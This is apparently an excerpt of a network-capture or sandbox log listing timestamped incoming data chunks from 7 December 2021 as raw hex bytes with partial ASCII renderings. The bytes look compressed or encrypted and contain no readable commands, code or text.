                                                                                              2021-12-07 12:39:07 UTC2086INData Raw: c1 1d e9 fa 7d 55 da f6 d9 7d ce bc 3d e3 5f a3 a5 9f 58 fa 9d 9a be f0 a4 08 34 db d0 6b d3 da d2 6b 8f 66 6a 13 8c dc 7f 6f a0 24 23 d4 f2 8f fe 89 d4 38 57 4f 15 17 ad c1 87 91 7a 5c 9f 29 84 e8 d5 4d 41 8d a5 5f e7 23 1a b8 ad 6f 93 4d f8 8d 11 39 d9 64 31 1d 1a 78 5d a0 63 ad aa 52 82 fb 4f 88 07 fc 6f ee 03 ff b1 95 14 f8 bf 43 1e 7c 01 de ed c2 66 2f e5 25 9c 10 fe a3 db aa 16 c6 8d cd 93 40 c2 f9 64 d8 7f 6b 7b 5c 6e e4 51 b9 d4 b0 27 ed 53 41 03 f7 5f 0e fe 58 5b 89 24 16 e0 9f ae f9 a8 a9 2c 81 92 a9 1e 87 a5 48 fe d5 1e 7c ff 87 31 a2 af f3 e6 59 fd 8d 5f 9d fa 7f 77 30 c2 fe eb d5 4b e0 7f 84 47 8b 26 21 fa df d4 fb 6b 8c db 8a e1 b4 cd 4b 9c 81 56 e2 7a 22 42 1a 6c bf 9e dc 32 c1 8d b6 4a 10 5b 83 f3 9f 2b bd 46 a5 4d a1 08 29 ca e6 c9 b6 fc
                                                                                              Data Ascii: }U}=_X4kkfjo$#8WOz\)MA_#oM9d1x]cROoC|f/%@dk{\nQ'SA_X[$,H|1Y_w0KG&!kKVz"Bl2J[+FM)
                                                                                              2021-12-07 12:39:07 UTC2094INData Raw: e3 41 74 4e 3f 90 e8 37 bc ff a6 95 47 35 b7 52 ce a7 19 28 9f 18 3c e5 7b 55 93 df 4f cc 75 01 f4 cf 2a 4c f7 af 50 ee d2 a2 02 fe af ff 2b 39 57 49 5d 1c f0 ff 41 de 59 ee d7 9f 61 fe 99 35 40 f8 5f 8a 5c 7e c8 fd b7 fb 0e f4 ef 93 38 e7 bd 7b e9 d7 53 5b 79 1b 13 bd 37 e7 d7 d5 8b 30 0d ea 88 c8 6d 5a 6e e6 47 f1 ad af 0b 15 e6 fa bd 02 fc e7 6e 5a db 5d 1d 62 98 ff 74 ef 6e 19 b7 44 b7 ae 94 5e 88 2e 5f 00 ff 03 d3 de 0c f0 3f 18 f2 79 43 3f f9 8a 17 f0 7f 92 db 0a e0 7f ad 1f c8 04 fe ff f7 d4 d0 e0 fd fb 42 97 c8 1a 6b 6c 0b fb af 86 0d 3f cf 2d 24 ff 0a c1 3f 28 5b cf fc 6f 87 42 e2 3c 74 9a e8 37 d9 6e 43 ff 6f 34 28 4f 7d b6 ff d6 9f 26 15 0e 83 f9 e7 0b 53 41 6d 5f 0a f8 9f 6a 24 b1 45 c9 74 10 65 4d 10 67 dd b7 fd c5 1c 6d de 61 3c f6 4f ff ff
                                                                                              Data Ascii: AtN?7G5R(<{UOu*LP+9WI]AYa5@_\~8{S[y70mZnGnZ]btnD^._?yC?Bkl?-$?([oB<t7nCo4(O}&SAm_j$EteMgma<O
                                                                                              2021-12-07 12:39:07 UTC2102INData Raw: 3b f0 3f 38 f5 ff 41 d5 cd 87 f7 ef 4e a8 1a e7 b8 2a e8 5f 77 f9 b3 41 ff b2 bc 82 e8 5f a4 a0 ff 89 9f e9 0e 77 05 fd 3b 32 ff 6e cd b9 dd 91 3e 06 2b d5 31 03 8f 5d 33 57 e8 7f 84 d2 03 39 8d 27 6d eb 78 08 c9 a2 f5 1c cd ca cf f2 2f ca a5 af 43 fe f9 d2 f5 47 81 3f 3e 5c fa 29 a1 c0 86 77 89 ce 49 fe f1 c4 23 12 5e 25 69 d0 7f d6 fd a2 09 9a da f3 71 96 10 c8 77 4e b9 fc c9 8f d9 80 f0 24 0d f2 df c7 f7 e7 4c f7 34 e8 09 cd c5 32 19 aa 2a b2 ac 8b 02 aa 8a 61 ff bb ee b1 2b 53 37 88 6f d0 a1 c5 27 15 74 a5 e0 59 05 de 68 f5 de 6b 45 61 4b aa 02 9f 2e 29 ef df 7e 58 f2 86 27 b8 07 ad 5c cd c3 be 5f 37 d4 28 69 be 27 ab 7c ac 10 24 9a 5e 4d fa 12 31 07 fa 67 d9 98 a7 9c 28 fb 15 55 cb 6b e8 31 90 7f 3a 2a fa 94 63 b8 e2 fd 55 fe 78 25 8e 3a 03 8d 4a ad
                                                                                              Data Ascii: ;?8AN*_wA_w;2n>+1]3W9'mx/CG?>\)wI#^%iqwN$L42*a+S7o'tYhkEaK.)~X'\_7(i'|$^M1g(Uk1:*cUx%:J
                                                                                              2021-12-07 12:39:07 UTC2109INData Raw: 29 f3 16 a5 de bb 1d fb ab 8e 25 d3 d4 4d 47 7d 44 30 96 e6 ba ff ec ef f3 b0 ff f0 5d 3a 02 fe e3 cd c3 56 44 ff aa 54 23 04 f8 3f 6e d9 e5 88 20 8f 66 d5 9f ce 0d f5 02 62 49 a4 d1 83 ea 9f 55 67 4d 79 a8 09 db 96 bf b3 0d 91 b0 db 14 80 ff 6f 84 3b e0 ff 6b 9d a7 fa a7 b9 4f 97 80 ff c2 05 fc 97 61 d5 60 d2 cc b5 2b b4 c6 c4 fb 0d e8 66 83 b7 0c 9c 76 c1 ff 5a c5 25 2f e4 a0 1a f6 5f d5 e9 2d a6 61 c5 c9 ba 37 7f 26 7a 24 5f c9 d5 c4 f6 36 b7 12 4c f5 f9 d9 09 fc 47 0d cf 30 74 2a f0 7f 27 04 fe 93 be 59 ea 97 c4 47 e4 2b a9 01 03 42 64 81 83 d7 52 40 ff 3f d0 da 2a 21 7b a3 bf 74 ae 76 f6 01 ba 6e 95 4f 71 a8 a2 4c 3f 91 3c 93 e8 ad 06 35 6a b4 77 29 b5 d3 cb d1 92 fd 4f c0 ff f4 2e 11 e4 bf b5 7f f5 57 39 2e aa 31 d6 e9 ba 62 be 65 4d 0c fe cf 05 e0
                                                                                              Data Ascii: )%MG}D0]:VDT#?n fbIUgMyo;kOa`+fvZ%/_-a7&z$_6LG0t*'YG+BdR@?*!{tvnOqL?<5jw)O.W9.1beM
                                                                                              2021-12-07 12:39:07 UTC2117INData Raw: 71 a7 7c 6b 9c 10 ee 3f 91 b6 55 b7 55 74 f8 ff c7 cf 66 13 c5 17 f3 d6 a3 9a 90 2f a3 c1 fb c7 78 d8 1c 54 93 4c 28 d5 e7 e0 f5 04 f8 bf 94 8a a6 8a 69 fd 7b 33 ce 76 da b8 63 d5 b1 b7 80 ff 6d fd 7d bd 5b 80 42 54 53 d9 a4 4f 2a 4b a6 05 45 5c 69 8c 0d f2 6f 43 ce bf 46 f4 6f dc 57 da 08 08 0d 31 48 61 fe 89 dc 36 0b 0e c5 91 d0 27 4f 71 5c f8 15 a3 07 f9 d7 db a0 c7 30 6f 23 de 6f 9b 2b 37 04 fe af 60 c1 ff c7 d8 7f ff 73 fd 86 fd e3 78 48 91 91 3d 32 0a 21 23 59 11 42 91 2d 54 56 f6 5e 51 56 c8 26 64 cf 28 3b 84 50 51 99 59 21 65 16 b2 f7 2a 4a ca 4c 46 7c 8f c7 f3 f1 e2 ba 9e d7 e7 fb c3 fb 2f 70 7b 3a cf c7 71 1e c7 7d 1d 01 6f 06 1e 07 0d 43 fe cb 1b c8 7f 79 39 0c fb ff 18 23 72 72 5b 8c 21 ff 66 29 de 7e f1 51 3c ec bf 95 dd 34 b7 cf 37 88 ba 61
                                                                                              Data Ascii: q|k?UUtf/xTL(i{3vcm}[BTSO*KE\ioCFoW1Ha6'Oq\0o#o+7`sxH=2!#YB-TV^QV&d(;PQY!e*JLF|/p{:q}oCy9#rr[!f)~Q<47a
                                                                                              2021-12-07 12:39:07 UTC2125INData Raw: e8 4c 98 bc 7d 3e 0e fe 3f 31 ba d4 8b 35 e0 9f f4 aa d9 31 56 77 63 77 16 d6 e7 3a 4b 1c 8e 93 78 69 47 31 ba d1 a0 20 f8 6d 8a c8 94 eb 0f 67 c8 3f 7f f9 80 ca d3 e6 3b ae 11 a9 bd 39 e4 9f 7d 13 95 ca 99 d8 00 fd b7 0b a1 44 31 e9 0d 7d 97 0e c8 3f 04 ff a3 13 9c 3f 77 0a 26 ff c5 86 f4 7b 37 f8 5f 98 8a 60 ff f1 a2 26 4f 32 92 7f ab b7 a2 e4 b2 34 02 fc 7f 4a 33 e4 bf 9a e6 fd f5 cb 3d cb 01 bf 3f 99 b9 c2 ca 61 ba e5 39 77 c4 b1 cd 25 d5 c1 3d e9 69 fd 0b d6 df 4e 35 92 7e e6 be d5 55 2d 13 3f a9 ef 2a c5 13 0d df ff a8 52 1d f9 a4 8c 4b 99 ea ac cb 35 8d a8 bd 79 d7 c5 1f f7 77 66 22 e4 94 93 98 ca 45 64 71 b6 b2 38 40 ff 71 6b cf 9b 45 5e 69 6a 39 10 f2 bf 35 45 aa 2f 9a cd d9 c3 fe b7 80 49 22 2c ff 67 de 49 67 50 dd 71 2f d7 d4 5a 11 d2 3e 79 fb
                                                                                              Data Ascii: L}>?151Vwcw:KxiG1 mg?;9}D1}??w&{7_`&O24J3=?a9w%=iN5~U-?*RK5ywf"Edq8@qkE^ij95E/I",gIgPq/Z>y
                                                                                              2021-12-07 12:39:07 UTC2133INData Raw: 12 d9 96 bf ce 2f db 3e 27 23 fb 1f ce d9 aa b1 f5 ae 37 0b bf c7 0d 2d 4c c0 3d 87 ef f1 16 f2 9f b9 f9 c7 81 ff db d4 02 fd eb 17 e0 3f a2 d5 4b f4 fd a0 ff d9 eb f3 38 b5 58 9f 44 44 e2 7e a1 b4 1a f2 bf 1f 4b 8f 43 fd ff a6 a8 2a a6 cf 14 b9 12 05 fd 4f af 86 7e 2f d1 1c 2f 9b 07 e8 3f 79 17 f6 36 4b 88 87 07 fe 81 ff f1 4d e5 93 05 26 8f bf ad e1 f5 7d f9 d0 ff 98 f7 4a a1 fa 1f 7a ca 57 b6 b0 ff a8 b5 0e f2 af e6 0a 10 fd db 1a 2d f8 1f e1 fd 3f 5f 4e 6a ff 00 f8 df 84 cd 7f ec ed c0 ff 2f 43 fe 09 3f 73 1d bc ff 89 e6 bf 09 e7 e8 bf 9e eb ee 54 e8 96 4b c7 01 fd 5f 51 7e 02 f8 ff 70 c4 8f 00 fe db 45 13 0e f9 5f a3 3f be c3 fe 53 42 fd 54 c8 3f d3 23 34 5a fe a4 33 94 a8 62 5d a2 9a 38 51 fd 96 f2 ba 0a 05 3f e4 ff b2 5d 26 07 fd cf 37 9e a1 06 47
                                                                                              Data Ascii: />'#7-L=?K8XDD~KC*O~//?y6KM&}JzW-?_Nj/C?sTK_Q~pE_?SBT?#4Z3b]8Q?]&7G
                                                                                              2021-12-07 12:39:07 UTC2141INData Raw: fa cf 60 5a e3 a5 ad 2a be c6 06 56 d0 3f d0 95 bd 76 f1 b7 77 ef 5d 67 76 83 fd 3f 75 77 e4 f8 b5 cd ab 5e 36 b3 1f 21 f6 17 9a f0 b6 06 fd 4f 7d 4f 52 2d e8 3f ad 36 d7 14 84 78 63 da 7b 22 07 8f d1 93 10 a4 7a 9c 71 fd be 7a a6 2f 54 18 f4 1f 3f bf 3e 1a 66 48 c3 97 d9 4d 95 86 fc 53 f3 6b a6 f7 81 ff 65 08 66 da 04 fd b3 d3 16 d5 d7 57 77 fe f2 ca 51 2d e6 16 dc b6 3c 5b 03 fe ef db 4f 26 4b 60 ff a3 72 ee e9 67 d7 ab f9 29 d4 8d af ad 59 b4 93 3b f9 d2 b9 78 9d 2c 2b 99 cc 87 fd 47 97 c7 dd 28 8e 95 6b 5f 8e 5e f0 ab da 7e da 7f e1 62 28 ee 0f 7b c7 57 8c 48 fe dd 87 85 e0 fb 73 f7 59 77 23 53 ae b0 15 2f ab b6 f6 8b f6 37 d6 28 0a 21 fb ff 70 c4 82 5e d3 bc cb 26 91 1a b9 b4 bd 7a f2 cc d2 38 f7 66 e9 99 3f 6f 41 ff 96 3f 9a 23 33 01 f4 57 21 91 e2
                                                                                              Data Ascii: `Z*V?vw]gv?uw^6!O}OR-?6xc{"zqz/T?>fHMSkefWwQ-<[O&K`rg)Y;x,+G(k_^~b({WHsYw#S/7(!p^&z8f?oA?#3W!
                                                                                              2021-12-07 12:39:07 UTC2148INData Raw: 54 ff e2 8b d1 bf 88 13 7f 53 32 05 fe f3 59 2b f1 09 35 cd 6f 54 f2 71 90 7f 65 2f 2d 07 f9 f7 ba 26 89 0e 90 ff 37 5e 9f 49 13 0d fc 2f 99 fd 11 63 36 02 25 e3 db 63 44 22 8c e1 f2 3a 2e aa 55 23 86 c7 77 60 ff 2f c7 61 a6 e5 1a 45 11 41 97 bd ca 67 7d 8b a9 52 bf 97 52 22 83 19 57 d8 20 ff 62 66 6b 73 0b f2 ef a2 6f c0 fb 0f fa 37 e1 44 63 06 d0 3f 2d 28 ac aa 05 29 dc c2 ea ff 56 77 f7 fb 3f 89 7a e8 ff c6 6a a0 ff 0b 46 fb bf 58 b4 ff 7b 72 18 d3 ff ad e2 34 1b 89 42 ff 27 1e b6 12 54 df 8b ea df 96 31 fa 37 56 3f 78 ff 41 ff a1 e2 37 52 0b fd 0f 65 d0 7d e0 bf 6e a2 fc 57 1b 86 ff 2a 22 1f bf 64 3d 41 f5 5d dd 82 89 15 be ff 68 3a 72 d8 7f 4e f4 83 95 f0 f5 17 a9 29 9e 14 d8 ff be f4 2f de 49 2c 70 51 8e f6 b4 d8 33 f8 fe f1 ec 56 fa d7 ac 24 d0 f9
                                                                                              Data Ascii: TS2Y+5oTqe/-&7^I/c6%cD":.U#w`/aEAg}RR"W bfkso7Dc?-()Vw?zjFX{r4B'T17V?xA7Re}nW*"d=A]h:rN)/I,pQ3V$
                                                                                              2021-12-07 12:39:07 UTC2156INData Raw: 8d 61 fe 99 c9 3a 4c 41 b8 8b 85 7f 5d 38 c0 bf 56 10 fc 6b f9 11 e0 5f ef b1 f0 2f 9a 03 fc 4b 07 a9 ff 0e 0b ff 1f fc 2b e9 00 ff aa 42 f0 af 16 6f fd 1c 17 14 ff 52 43 f1 2f 69 14 ff 7a 1a 3d de 8e e0 5f fe d5 30 ff e3 81 fe 13 ab ff 55 3f e8 7f dd 91 fe 57 cf f0 ff f6 bf 87 0f fa df 3d a4 ff 75 ba 08 fd af 01 56 ff 3b 7a d0 ff 6e 22 fd 6f a6 a0 20 ee 27 b4 ff a5 46 fb df 3c b4 ff d5 90 6f a4 46 fa 5f 3e f2 14 1f 4f 2c ff bf c1 9d 7d ff bf 2a 82 7f 31 66 80 ff ff 3c 96 ff 9f f8 d6 be ff 7f 1e f2 5f 0b 46 a8 c0 ff 6f 8c fa ff 3b 50 ff 3f 23 11 c6 ff ff e0 e9 d2 e4 22 f8 ff a3 a3 33 ba d9 74 b1 f0 7f 99 03 fc ff 39 82 ff d7 1d 4e 55 2d c1 d2 bf f0 37 ec eb 5f 2e 21 f8 57 8c f9 de ba 33 96 ff 93 2b 65 df ff f9 f9 14 e8 5f 98 74 c1 ff 59 80 85 7f 3d 38 c0
                                                                                              Data Ascii: a:LA]8Vk_/K+BoRC/iz=_0U?W=uV;zn"o 'F<oF_>O,}*1f<_Fo;P?#"3t9NU-7_.!W3+e_tY=8
                                                                                              2021-12-07 12:39:07 UTC2164INData Raw: 87 3b 1d 3e 9d 6f b5 8f 35 97 f7 0e ca 23 52 0d f2 79 3a d0 20 ce 2f 7f ea fd 96 da 4b 46 53 92 af c0 e9 cf 79 64 0e f7 3f fb 1f 96 06 2e 0f a2 ab 6d 22 c8 d1 5e 3b e1 76 f8 11 55 28 23 bf 4f f6 18 59 72 94 4e e0 66 26 ec db ce 5e a0 f3 cc 2d de 5f 43 c1 9c 27 17 8d 3b 14 ae d0 ec 97 e8 a0 c2 fc bc 84 89 94 4f 87 62 b0 67 47 27 f3 19 0d cb 5f f7 f8 f8 75 50 93 e1 ad 87 02 c5 0f 7d ef 8d c9 a5 9f eb 38 09 89 da 74 18 1e 6c 2b 8a 66 e6 ca d9 87 bd a1 fe 21 4d ad 4b 3c ae 38 1e f6 7c ea 75 05 ad d0 07 8d 90 ac cf 1f 3a b8 31 c2 07 d6 6c 7d 62 85 4e 72 a4 9e 65 49 92 79 f1 27 68 08 8a f5 2d f1 3d d5 b0 3d 31 63 1c 50 bd c5 f9 0b 3b cf 74 83 a5 e8 51 e2 95 4c 04 6d d7 9c 39 fa 2a 51 4f 8c 66 2b eb d3 78 4b 1b bc fc 83 1b a1 fa 61 78 0f 1a 37 dc 49 ab c8 da fa
                                                                                              Data Ascii: ;>o5#Ry: /KFSyd?.m"^;vU(#OYrNf&^-_C';ObgG'_uP}8tl+f!MK<8|u:1l}bNreIy'h-==1cP;tQLm9*QOf+xKax7I
                                                                                              2021-12-07 12:39:07 UTC2172INData Raw: 9b 74 a8 fe c3 81 0c 54 ff ef ee 6e 9a ea 9b 8c 3f 50 ff 83 20 a8 ff d9 70 ea 0c 6a e5 f1 13 a8 fe 7b 7f a2 d6 9c 8c 79 ff 60 26 3e f4 fe 59 c2 1f ea 7f d5 59 a0 af f7 2c 25 11 ea 7f f1 19 aa 7f 5e f1 aa a5 92 f4 d0 06 aa 7f 5e a7 e6 4a 5b 17 17 47 54 c6 6a 0c f5 7f af 37 a5 75 59 0f 7f 7a 44 a7 09 d6 3f f8 43 27 c3 37 b0 5e 2d 7b 8e 43 f5 1f 58 32 0a 93 15 7f 27 c8 ba 7f e1 9d 25 5e cd f6 79 d5 c4 c0 be ad bc 5b 7d 13 aa ff 6d f4 a1 3c 29 ac d7 96 ef da 97 c0 08 5a ff e8 73 be e2 aa ce ac 5f ae 39 84 ea 3f 18 10 14 9b 99 8a be ff dd 51 40 0f d5 bf b1 8a 4b 2c d6 91 1e 3f 65 c6 8f 47 a6 63 5c 6b c9 c0 87 36 40 07 50 26 78 6d af 37 d0 90 9c a1 fe 57 7d 5f e5 71 d7 d3 a1 fe 37 be 50 ff 0f e4 1d bf 14 fd c5 61 a8 fe 3f d7 8f 37 f2 54 71 24 7e de 39 ce 50 ff
                                                                                              Data Ascii: tTn?P pj{y`&>YY,%^^J[GTj7uYzD?C'7^-{CX2'%^y[}m<)Zs_9?Q@K,?eGc\k6@P&xm7W}_q7Pa?7Tq$~9P
                                                                                              2021-12-07 12:39:07 UTC2180INData Raw: d8 f7 73 9c 79 25 21 e9 a3 34 f0 cf a8 ce 70 a0 7e 92 e5 02 93 54 02 91 ff 70 d1 d5 95 bf ab 36 dd e5 46 e4 3f e4 cd 3d 86 5e 54 54 46 4a 44 fe 5b d0 d5 1c 79 38 f8 ee 37 f0 ef d2 cc 04 e5 19 f4 52 f8 69 68 d3 3f f9 ef 30 0a a9 12 fd 02 f8 07 ce 7f 3c 96 1c 89 34 43 81 7f 0f a1 fd 5f b4 83 cf 47 7a 78 c0 bf 40 28 ff 99 32 2a 2d f7 ca 02 ff 4e a0 f3 9f a3 77 63 ee 5f 7a 80 7f 34 07 ab 17 8e 99 77 77 3f 29 00 ff 8c a1 fd ff 2b df b4 6b c2 51 e0 1f 38 ff a4 a9 c4 5c 9e 58 06 fe 81 fd 5f e7 07 31 1d b2 35 c0 3f 42 c8 3f 7c a1 4c e6 21 76 e0 df 6a b8 59 8b 49 8a 3d 4a 8d bd 3c 22 ff 6d da 7c 0c 64 95 7f f2 02 f8 e7 55 da 56 9a 58 cd f1 9f fd cf 6b bf 98 1d e0 5f 06 74 fe c1 ff ac 94 fd f7 f0 f1 ff f6 3f 91 1d ee bd 05 fe 29 e7 0a 70 f6 a7 d9 cc 11 39 03 ff 46
                                                                                              Data Ascii: sy%!4p~Tp6F?=^TTFJD[y87Rih?0<4C_Gzx@(2*-Nwc_z4ww?)+kQ8\X_15?B?|L!vjYI=J<"m|dUVXk_t?)p9F
                                                                                              2021-12-07 12:39:07 UTC2187INData Raw: e0 9f e9 0d d8 bf 00 19 e0 5f 7e 08 ec 9f d7 26 f0 8f 9f 12 f6 cf ed 11 f0 4f 90 0e f6 ef 5e 3d f0 ef 81 3e ec 1f 15 22 ff c9 19 c2 fe f1 3b 00 ff 14 af 60 ff 68 10 f9 6f e2 3b ec 5f 37 22 ff 31 66 c3 fe 11 4b 03 ff 50 cd 60 ff 56 a6 80 7f 84 75 b0 7f 01 88 fc 97 d5 02 fb 47 39 0a fc fb 54 07 fb 97 8c c8 7f 8f 83 60 ff 50 4c 80 7f f9 56 b0 7f b8 88 fc 57 23 04 fb c7 91 0b fc fb 4b 08 fb 37 e1 09 fc ab 41 83 fd 33 cf 01 fe 21 45 c0 fe 29 23 f2 9f 3d 03 ec df 31 29 f0 cf 7a 03 f6 6f 01 91 ff ee c8 c1 fe 7d 40 e4 bf 06 61 d8 3f 7f 44 fe 33 6f 84 fd bb 12 02 fe c5 e5 c2 fe b9 22 f2 1f d1 29 ec df 8e 32 f0 8f a6 19 f6 8f f7 39 f0 4f dc 13 f6 cf f1 1b f0 cf 7b 1a f6 ef 2e 22 ff f1 5f c1 fe 11 27 01 ff 3c 43 60 ff 36 10 f9 ef c4 17 f6 af 28 12 f8 77 1a 01 fb d7
                                                                                              Data Ascii: _~&O^=>";`ho;_7"1fKP`VuG9T`PLVW#K7A3!E)#=1)zo}@a?D3o")29O{."_'<C`6(w
                                                                                              2021-12-07 12:39:07 UTC2195INData Raw: e9 7c 5b d5 91 4b e9 89 e8 fa 66 68 75 bf e5 63 d9 fb 50 d3 18 fb 23 83 eb f1 58 c8 66 4a e5 f0 bf 93 13 0d c3 fe 9d 8f 2f 0c 11 1d 94 7a 9b 70 42 8f f9 c3 c4 57 f5 f6 bf 11 ba 7b df f5 da 64 23 21 84 bb 65 ca e1 9f 5e 50 ba 6b 69 40 4e 63 ab 4e ae 3e 3e bb a7 11 dd cd a9 4c 74 85 5c 28 e7 d4 07 b0 ed dc d6 9c a4 99 4a a4 d6 69 d8 4a 0c 4d 85 99 9d 4b 66 23 6f 05 6e ef d5 3f 81 fa 7f 3b 5a 7c b2 67 18 4b 63 36 3c b9 12 b2 57 34 bb b4 47 3b 10 4b c2 dc 8e ed 5e a3 c5 ef 13 e2 2d ea d6 24 3d 69 06 b9 70 2f 7e 18 ce 33 a7 14 dc 3e de 67 e7 d3 cd 9a 26 a5 e1 59 d5 c8 0e 92 f1 f7 27 ac 0b d4 1e af 9d 51 09 98 cd 25 ce 73 f8 83 86 82 d5 36 29 34 a7 5d fd d9 55 13 59 f4 12 02 7b ee 40 8a 20 90 16 63 62 09 98 ff 50 72 b8 04 f4 ff 66 11 29 40 ff 7d 21 66 01 e6 5f
                                                                                              Data Ascii: |[KfhucP#XfJ/zpBW{d#!e^Pki@NcN>>Lt\(JiJMKf#on?;Z|gKc6<W4G;K^-$=ip/~3>g&Y'Q%s6)4]UY{@ cbPrf)@}!f_
                                                                                              2021-12-07 12:39:07 UTC2203INData Raw: d0 f2 23 39 9b 76 3e 3d 4d 47 18 45 22 ac 9c a7 30 7a f9 0b a8 8f d0 b8 74 09 0c 8d 9f 04 c1 ba 43 f1 ce 6a 46 ed 35 b4 5f 3f 8e 3b 1c d7 16 ab 5e 22 00 ef 5f b6 4f 91 7a e5 0b 1e 02 68 73 70 6f 22 69 57 71 e2 e5 a3 34 d6 61 ae a7 6f a9 d4 f6 0a 11 e2 99 0c b2 8c 40 e7 71 aa 15 f3 40 ba 81 63 5d 46 14 d8 f6 03 f1 55 c1 34 67 b7 f3 a5 12 15 93 2b 83 35 f3 58 ca dc d3 82 d6 67 44 5d b6 e1 8d 9b 08 6b e3 8f ed b4 4c 45 8a 94 9f 20 a3 75 a8 1a e8 7f 3e ab 5d 85 7a 93 b6 43 ca 5d 6a 2e d4 25 be 04 4f 35 d7 83 37 b8 4c c4 3a 7e 06 c5 06 db b7 bd 83 12 29 4a ff 63 9e 55 01 b7 e0 e1 25 ac 6b 13 ef 7c 35 8f a8 bb 06 7b db b1 15 0a 78 ad 9e b9 10 ff 0b 39 80 6d 82 1e ab 34 77 a2 9d 80 95 17 9c cc 31 7c c7 39 0d 42 53 d1 88 52 b1 15 96 45 b3 49 ac 97 1f 8f b9 44 45
                                                                                              Data Ascii: #9v>=MGE"0ztCjF5_?;^"_Ozhspo"iWq4ao@q@c]FU4g+5XgD]kLE u>]zC]j.%O57L:~)JcU%k|5{x9m4w1|9BSREIDE
                                                                                              2021-12-07 12:39:07 UTC2211INData Raw: 45 ea ff a6 3d dd 48 e0 a4 e0 2f e8 2d 98 a0 79 38 d6 5a 1b 88 03 5f 54 86 4a 61 fd 1e b1 fb 7c 9a d2 83 50 19 09 87 7a 1c f8 ff ef 86 68 fe 2e de e0 22 96 3a b5 be 51 4e d0 e4 db 29 a8 d5 4c f8 65 ba e4 8c ea ea 47 94 08 38 b4 6f e4 38 13 93 7b a0 16 a2 99 b1 2c f6 6a c8 d5 1d ad f5 32 89 18 3f b6 8e da e0 f6 dc 28 7e 10 78 e1 03 bb 88 23 46 00 fe cb 2b 5c c2 62 b1 c6 2c d1 19 85 93 a8 5d 51 fb 59 4c ee d3 af 9c f7 96 3b ec 50 5f 87 62 e4 a3 35 07 5f 44 e1 d0 7c 1d be 45 5c 62 80 ca 76 9a e3 67 9e 61 1a 94 8d a5 91 d2 4f c2 fe 87 ff a3 0a de 32 90 f3 66 cb 39 7a d0 f3 19 61 f7 b7 dc 4a e7 fa 3b 27 cb e9 e8 34 d1 4e 78 2b 60 91 00 19 ef 73 45 33 5b 42 96 bb a6 46 36 9d 14 31 ce f5 5d b0 cb 7a 1f ec c4 81 11 b9 9e 56 96 35 ed 47 d3 af 86 0d de f9 d9 e4 4f
                                                                                              Data Ascii: E=H/-y8Z_TJa|Pzh.":QN)LeG8o8{,j2?(~x#F+\b,]QYL;P_b5_D|E\bvgaO2f9zaJ;'4Nx+`sE3[BF61]zV5GO
                                                                                              2021-12-07 12:39:07 UTC2219INData Raw: 0f de bb ab fb 1c ac 58 6e 17 ad c7 c6 4a 2a 77 f8 a9 82 60 d1 9c 0c c9 4f ee 81 fc 47 00 5d 62 54 b5 26 7f 8b 2c f3 3f f5 8f 12 e6 70 04 24 c0 ff 7e ff 62 2c d0 fb df f7 bf 6e 9b bc c9 b7 77 af a5 1e 4d e1 63 9c fe d5 de c1 e3 6b fc af 41 c9 0d 34 f4 db 01 73 5e 0f 81 10 e4 7f 5c 28 da 3e a1 a6 7f 4f a9 4b c5 09 37 d5 65 5b d1 fa ca a9 5c 85 37 50 cd cb 89 50 f9 ea ff dc 00 f8 1f 67 9e 1b 65 2d e8 6b 48 9a 00 fe 37 c5 3c 0a 0f 4c f4 4b d4 c6 35 54 f8 e2 7c a2 98 9f 6c c0 3f bc b6 f6 8e 78 4e 48 6e 7f 98 84 33 1f a8 7d 3f d2 9a 4d b0 91 8a 08 79 36 6d b2 ff 4f ff ff 1f fe 9b 4c 98 80 af 69 73 5e d5 16 3f c5 51 e1 e7 16 52 54 c5 be c2 a0 b1 9a 09 cf da 0c c3 5e 17 a3 a4 68 27 03 d3 52 fb cb 8f d0 7f 5b 5e 42 3c 11 07 b4 01 f9 d5 d4 db cd 7f b1 76 54 01 fe
                                                                                              Data Ascii: XnJ*w`OG]bT&,?p$~b,nwMckA4s^\(>OK7e[\7PPge-kH7<LK5T|l?xNHn3}?My6mOLis^?QRT^h'R[^B<vT
                                                                                              2021-12-07 12:39:07 UTC2227INData Raw: eb f2 57 76 f5 b5 df 37 81 b3 e9 8a 0c 7f a8 fb 32 26 6b 12 19 ce bf 8e 91 41 b4 c6 87 e9 de e6 bf ca e0 b3 34 ba 9d 46 64 e4 84 28 b5 3f d3 40 4c 9d 53 79 ea b4 05 4c 1a ce 62 05 6b 75 4d b2 9d 74 aa b8 70 3a 6a 15 de 97 34 1f 73 72 00 81 1b 4f bb 11 cb 9d 72 50 bc 62 15 4d 4d 75 35 af c8 65 48 89 96 52 b4 62 3d 4e b1 67 26 e5 fc 5b ce d9 11 27 25 69 af ec c5 8b 4e c2 de 35 14 69 d9 be 84 d1 6d 5d 7d 5a 6d ff d8 16 60 d4 e5 d4 d9 6b da 4f 44 22 3c 70 c4 3a 8f d2 8e 15 69 db cf 43 9e d1 89 e0 e8 44 09 b1 12 67 cd 1e 40 0c 72 dd d1 3a c4 18 27 08 62 60 1f 24 c4 b0 26 35 6a c3 8b 32 71 e5 db 4e ca 21 3c 4f c5 36 ee ed 99 83 b1 bf c9 d0 79 73 9c c9 d5 bc dc 29 5a 64 7f d3 44 60 7a b3 38 d5 b5 15 10 03 a4 de 2c 48 2d 96 d1 8a f4 38 45 9e 03 94 f3 fc bd 3d 40
                                                                                              Data Ascii: Wv72&kA4Fd(?@LSyLbkuMtp:j4srOrPbMMu5eHRb=Ng&['%iN5im]}Zm`kOD"<p:iCDg@r:'b`$&5j2qN!<O6ys)ZdD`z8,H-8E=@
                                                                                              2021-12-07 12:39:07 UTC2234INData Raw: e9 4b 97 68 0e 02 79 b3 35 3b ea ba a3 88 3e 4f 4f aa 4b 82 3a f4 64 8f 87 e2 5d ba 44 1b 1f 62 7d e5 9d 9d d0 25 d5 07 19 d6 7d a4 fe 53 77 28 95 4f e3 ea 4e b4 20 3c 38 17 bb 54 be de a0 f2 4d 26 6d 7f d5 2a bd 6d 8a f9 17 7e 95 42 57 eb 56 78 4b e1 f6 0b da 27 3d 76 6c 5f b6 ec 16 07 29 84 84 0f ae 2e 12 16 3b 7a f0 a5 98 b0 ff 19 96 50 d0 81 55 44 72 fd eb 17 cb 1d 5d da 47 1e cb 2e fa 87 49 63 4c cf 52 8a 70 c1 e2 1e f4 9f ce 16 1e ea 8d ac d1 12 89 3b 3c 6a 07 4e 16 ed 71 ff 35 a9 fc 16 72 a8 fb 96 2f a9 fc 21 5a f9 61 8a f0 47 5f 92 3e de 49 cb be f8 48 6c d9 09 fa c0 e1 b8 73 08 86 69 e7 10 38 48 1e e5 f6 f5 d0 c8 33 e3 0e 21 08 0a 27 28 93 d5 